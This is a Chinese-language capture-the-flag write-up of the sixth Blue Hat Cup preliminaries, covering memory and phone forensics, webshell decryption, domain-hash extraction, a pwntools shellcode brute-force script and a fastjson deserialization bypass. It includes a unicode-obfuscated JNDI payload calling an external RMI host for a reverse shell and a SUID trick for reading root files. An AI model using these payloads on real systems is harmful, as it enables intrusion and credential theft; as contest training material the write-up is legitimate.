第六届“蓝帽杯”全国大学生网络安全技能大赛部分wp
2022-7-27 21:31:54 Author: 山警网络空间安全实验室(查看原文) 阅读量:18 收藏

“蓝帽杯"全国大学生网络安全技能大赛,是面向全国公安院校和普通高校大学生的高规格、强影响力的实战技能大赛,被誉为未来网警的“奥运会”。第六届“蓝帽杯"由公安部网络安全保卫局、教育部教育管理信息中心、中华全国总工会·中国职工电化教育中心、中国教育技术协会指导,中国人民公安大学、北京理工大学和奇安信科技集团股份有限公司联合主办。

本次比赛升级为综合性赛事活动,考察选手网络安全攻防对抗、电子取证等安全能力。本次赛事包括比赛、培训、高峰论坛等活动。通过三方合作覆盖全国警院及高校,打造“实战化,体系化,常态化"的网络安全人才培养新机制,为国家重点单位和机构输送网络安全实战型专业人才。

在本次初赛中,我校网安社取得了优异成绩,共有7支队伍成功进入北部赛区半决赛,为学院争光添彩。

  • 取证

    • 计算机取证_1

    • 计算机取证_2

    • 计算机取证_3

    • 计算机取证_4

    • 手机取证_1

    • 手机取证_2

    • 网站取证_1

    • 网站取证_2

    • 网站取证_3

    • 网站取证_4

    • 程序分析_1

    • 程序分析_2

    • 程序分析_3

    • 程序分析_4

  • Misc

    • domainhacker

    • domainhacker2

  • pwn

    • EscapeShellcode

  • WEB

    • Ez_gadget

取证

计算机取证_1

volatility -f 1.dmp --profile=Win7SP1x64 mimikatz

计算机取证_2

volatility -f 1.dmp --profile=Win7SP1x64 pstree

发现MagnetRAMCaptu,对应2192

计算机取证_3

passwarekit解析内存中的秘钥

取证大师挂载解密

导出后用字典爆破这个PPT

打开得到

计算机取证_4

那个新建文本文档.txt是truecrypt

还是用passwarekit+内存移除加密,生成一个test-unprotected

用取证大师解析移除加密后的truecrypt镜像,有个zip

爆破6位数字,991314

得到

flag{1349934913913991394cacacacacacc}

手机取证_1

直接搜照片名导出即可

手机取证_2

直接搜姜总

网站取证_1

D盾扫一扫

上面这个就是

网站取证_2

找到

稍微改改,访问得到KBLT123

<?php

$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n""/r""/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;

网站取证_3

找到这里:jyzg123456

网站取证_4

先根据数据库结构,记事本处理下成脚本也可识别的格式

把最后一列弄出来

# -*- coding: UTF-8 -*-
f = open("7.txt",encoding='utf-8')
line = f.readline()
while line:
    a = line.split(', ')
    print(a[7].strip('\n'))
    line = f.readline()

php解密脚本改一改,加个循环

<?php
$flag = ['mZVymm9t','lpxqlXFo','l5xummto','m5Zwm3Bn','nJhtlGlm','m5tpmGtm','m5ptnGtu','mZlym25r','m5hpnHBu','m5prlm9u','nJlyl2hu','lptummhs','lpxrl21n','mZRpnHBs','mZpxm2lr','m5dtmGls','mpxvlnBv','mJpynHBt','nJZwm2lu','mpdtnWxq','nJdtlmpr','mZtymHBm','nJlslmpp','l5RunW1p','nJxplXFm','lZdpmm1s','mZZwnW9u','mJVrmmhp','lZZwl3Bs','m5xvm2hm','mpZslmpm','mZtrnGtp','lp1rm21t','nJxplmtp','l5twlXFq','lphqmm9s','m51wmG1q','mJlxlWto','lJ1vmXFq','mpVpmW5r','m5lrlGpr','mpxplm9u','lZpxnHFn','nJdymWpm','mJpum3Fo','lpRrmWto','lZtunXBv','lpprnWtt','lJdslnBr','lJZrnWpm','l5Zrm21m','lJdul2hm','mphylG9q','lZhpm2pp','lZ1qnW1s','nJ1tlHFp','mZxqm2tp','mZdsm21t','mpRvlG9o','mJVqlmhv','mJRwlHBq','l5dtmWtt','mZdylHFt','l5RqlWxn','mZ1um3Fs','lJ1rnWhu','m5pulWhv','lptrnW1u','m5xynWxn','lpRynGtr','mpxulGlm','nJdslm9r','lJhslHBq','nJpwnWhu','mptql2tv','l51xmmlp','mZVymXFn','lJhqnW5q','m5ppmGpr','mZlqm21t','mpZslWxt','mJ1pnHFm','l5drlXBp','mJlvmW1u','mZtxlG5t','nJtsnHFn','l5Rvm29o','m5xvlWxv','m5Zrl2xm','mZlwlG1u','nJpvlWtr','mJxym25s','lpVqnWxv','mZVvl3Fq','lZVtlW5m','lZRqlGhn','nJxqm2hn','nJVtl21s','lJdumWlq','mJtxmGtp','mZxsnHFv','lpdtl2xn','mphqlm5p','lJdxlGpn','lpVvlHFu','lJhvmHBn','l5xunGtv','lZRul2pt','mpdqnGxu','l5Zxlmho','lJppmWhq','nJVylWpp','m5VxnWlr','lpdsnGtq','mZ1tnGpt','mJVqmmtq','l5hslWhm','lZZtl21r','nJlumGlm','lJhsmW9t','lZZym25s','l5tpnHBt','nJVunG1q','mJdtlHFu','mpVtlnFp','mplrnG1t','mJ1ylHBr','nJhynG5m','mplymG1r','lJtxlGxo','lpRxnGlm','mZxwnG5s','mZptnWpn','mJZylGxq','mZZvm3Fo','lJdxnW9t','lZtxmXFv','nJxtlXFm','mJZumW1r','nJ1tmG1p','mplslmpu','lJZxlG5p','nJtxmXBq','lZdxmmtq','lJdrlG1o','mpZtmmlm','mJVxnGpm','mJVwmWxu','mplslWps'];
for ($n = 0; $n < 149; $n++){
    $data = $flag[$n];
    $key = 'jyzg123456';
    $key = md5($key);
 $x = 0;
    $data = base64_decode($data);
    $len = mb_strlen($data);
    $l = mb_strlen($key);
    $char = '';
    $str = '';
    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }
        $char .= mb_substr($key, $x, 1);
        $x++;
    }
    for ($i = 0; $i < $len; $i++) {
        if (ord(mb_substr($data, $i, 1)) < ord(mb_substr($char, $i, 1))) {
            $str .= chr((ord(mb_substr($data, $i, 1)) + 256) - ord(mb_substr($char, $i, 1)));
        } else {
            $str .= chr(ord(mb_substr($data, $i, 1)) - ord(mb_substr($char, $i, 1)));
        }
    }
    echo $str;
 echo "\n";
}

得到

['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
# -*- coding: UTF-8 -*-
m =['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
f = open("6.txt",encoding='utf-8')
i = 0;
line = f.readline()
while line:
    a = line.split(', ')
    a[7]=m[i]
    i = i+1
    print(a)
    line = f.readline()

用上面的脚本替换,然后利用记事本批量处理一下,根据日期得到

相乘

# -*- coding: UTF-8 -*-
f = open("7.txt",encoding='utf-8')
line = f.readline()
while line:
    a = line.split(', ')
    print(float(a[3])*int(a[7].strip('\n')))
    line = f.readline()

因为float的问题,不用管,直接加

再相加

p = 0
flag = [24787.08,15247.68,19425.28,33111.24,37760.4,34817.2,34593.520000000004,26390.600000000002,33635.520000000004,34491.12,38372.32,15024.24,15294.04,36053.159999999996,40122.9,50064.96,47177.34,34193.22,55663.079999999994,44096.64,56053.5,40768.799999999996,57193.38,20297.65,49009.5,11532.800000000001,31398.9,25630.15,11369.300000000001,44335.0,36161.0,33641.65,19637.850000000002,49011.65,33403.58,23917.320000000003,62821.780000000006,39069.240000000005,13761.580000000002,49739.55,59641.75000000001,54619.46000000001,18822.370000000003,93952.0,56579.200000000004,30253.2,27598.9,36293.700000000004,13328.5,18438.0,63412.5,20295.0,112361.09999999999,36108.45,43793.4,149113.94999999998,102259.95,95063.55,105910.8,76681.34999999999,76062.59999999999,73871.29000000001,108646.49,68193.97,118285.32,32794.36,147068.53,63402.86000000001,151289.97,52671.950000000004,133451.7,158656.75,24324.280000000002,164544.36000000002,177407.97,114680.99,142505.93,32651.72,197897.75,149904.11000000002,166323.81,129995.8,95080.26,122442.76,149174.74,214256.02,89489.84,194952.78,180914.8,164264.5,241533.75,147441.5,77987.25,154098.5,53540.0,50250.25,245425.25,228589.0,39299.06,167745.56999999998,198330.71,96958.89,214966.27,40026.09,63219.600000000006,29296.2,97167.8,41065.4,146369.6,85640.40000000001,32100.800000000003,183824.6,163783.0,93473.52,194551.56000000003,143257.52000000002,124068.00000000001,62819.40000000001,267514.80000000005,40201.560000000005,75822.78,155392.71000000002,302231.82,176252.34,235716.69,248442.81,197698.05000000002,313453.8,250620.15000000002,62314.7,108083.5,240753.09999999998,232722.34999999998,185165.4,219377.19999999998,48641.95,97509.65,344466.5,183944.25,348058.55,263629.8,44822.049999999996,342504.39999999997,88294.58,48859.24,268105.7,191963.4,191492.76,278656.62]
for i in range(len(flag)):
    p +=flag[i]
print(p)

得到15758353.76

程序分析_1

在线分析:https://mogua.co/static_analyzer/?name=EXEC.apk&checksum=4606097ab3e8b7f42e8628996fdd4a62&type=apk

程序分析_2

android.intent.action.MAIN指定入口,在这个xml里进行定义,找到

程序分析_3

一进来就看见有个base64,解开是个网址,提交正确

程序分析_4

一直翻源码翻到了这里,有安全判断,应该没错

有一个f (d.a.a.c.a.a(this))进行判断,跟进到d.a.a.c.a,类名就是a

Misc

domainhacker

流量里提出一个压缩包

蚁剑流量,有压缩包的密码

解压找到对应的NTLM即可,要flag包起来

domainhacker2

跟上面一样拿到压缩包密码:FakePassword123$

然后参考:https://www.freebuf.com/articles/network/251267.html从NTDS.dit获取域散列值,用https://github.com/SecureAuthCorp/impacket中的secretsdump.py,一把梭

pwn

EscapeShellcode

要写shellcode,程序已经完成了or,需要我们将在bss段上flag的w出来,

我们进入到我们写的shellcode之后,寄存器除了rip其他的都被扬了,

没办法利用其他的地址,只能lea r13,[rip]将rip中的地址整到r13中,

然而我们flag的地址与heap地址偏移随机,需要爆破三位,

然后我们可以将上面的看作固定偏移进行一个遍历

有如下脚本:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\x00'))
uu64    = lambda data               :u64(data.ljust(8,'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

for i in range(9999):
 p = remote("39.107.124.203",16714)
 #p = process('./escape_shellcode')
 
 num = 0x1000 * i
 shellcode = '''
 lea r13, [rip]
 sub r13, 0x351
 add r13, 0x120
 sub r13, '''
+str(num)+'''
 mov rdi, 1
 mov rsi, r13
 mov rax, 1
 mov rdx, 0xff
 syscall
 '''

 sl(asm(shellcode))
 p.close()

自动爆破

WEB

Ez_gadget

反编译得到主要的源码:

  • JSONController.java
package BOOT-INF.classes.com.example.spring;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.example.spring.secret;
import java.util.Objects;
import java.util.regex.Pattern;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class JSONController
{
  @ResponseBody
  @RequestMapping({"/"})
  public String hello() return "Your key is:" + secret.getKey(); }

  
  @ResponseBody
  @RequestMapping({"/json"})
  public String Unserjson(@RequestParam String str, @RequestParam String input) throws Exception {
    if (str != null && 
      Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str)) {    // 绕过1
      String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*";    // 绕过2
      Pattern p = Pattern.compile(pattern, 2);
      boolean StrMatch = p.matcher(input).matches();
      if (StrMatch) {
        return "Hacker get out!!!";
      }
      ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
      JSON.parseObject(input);
    } 

    
    return "hello";
  }
}

fastjson 1.2.62 rce漏洞,但是有两个绕过,首先是绕过 hashCode() 对字符串 key 的比较,这里直接参考 虎符CTF2022 ezchain 这道题就行了

只需要前两个字符串计算出的hashcode相等即可。

访问靶机环境,获取key:

根据上述文章中的思路,很容易计算得到符合要求的key字符串:

k0R7AqTK5czIIfbk

这就绕过了第一个限制,对于题目的第二个限制,我们直接通过unicode编码即可绕过:

{"@type":"\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0078\u0062\u0065\u0061\u006e\u002e\u0070\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0065\u0064\u0069\u0074\u006f\u0072\u002e\u004a\u006e\u0064\u0069\u0043\u006f\u006e\u0076\u0065\u0072\u0074\u0065\u0072","AsText":"\u0072\u006d\u0069://47.117.125.220:1099/iqfcrq"}

发送以下payload,成功反弹shell:

str=k0R7AqTK5czIIfbk&input={"@type":"\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0078\u0062\u0065\u0061\u006e\u002e\u0070\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0065\u0064\u0069\u0074\u006f\u0072\u002e\u004a\u006e\u0064\u0069\u0043\u006f\u006e\u0076\u0065\u0072\u0074\u0065\u0072","AsText":"\u0072\u006d\u0069://47.117.125.220:1099/iqfcrq"}

flag再/root/flag.txt,suid提权即可读取flag:

/bin/date -f /root/flag.txt

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450783623&idx=1&sn=5afa643e54c0a051674a444bab85b254&chksm=b1030ca0867485b6c27c7eba36dce75af7569f8792d5d384a4d13faf601598b7497d9b0cb451#rd
如有侵权请联系:admin#unsafe.sh